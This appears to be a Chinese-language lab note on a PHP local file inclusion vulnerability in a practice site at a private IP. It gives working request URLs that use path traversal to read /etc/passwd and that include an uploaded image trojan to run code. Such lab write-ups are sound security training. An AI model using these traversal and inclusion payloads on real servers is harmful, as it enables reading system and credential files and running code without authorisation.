由于服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行
通过filename=file1.php&submit 此处有漏洞、可以通过访问任意目录
http://192.168.10.110/06/vul/fileinclude/fi_local.php?filename=file1.php&submit=%E6%8F%90%E4%BA%A4
通过../../../../../../../../etc/passwd访问到服务器配置文件
http://192.168.10.110/06/vul/fileinclude/fi_local.php?filename=../../../../../../../../etc/passwd&submit=%E6%8F%90%E4%BA%A4
上传一张1.jpg的图片木马也可以通过文件包含漏洞访问到
http://192.168.10.110/06/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/1.jpg&submit=%E6%8F%90%E4%BA%A4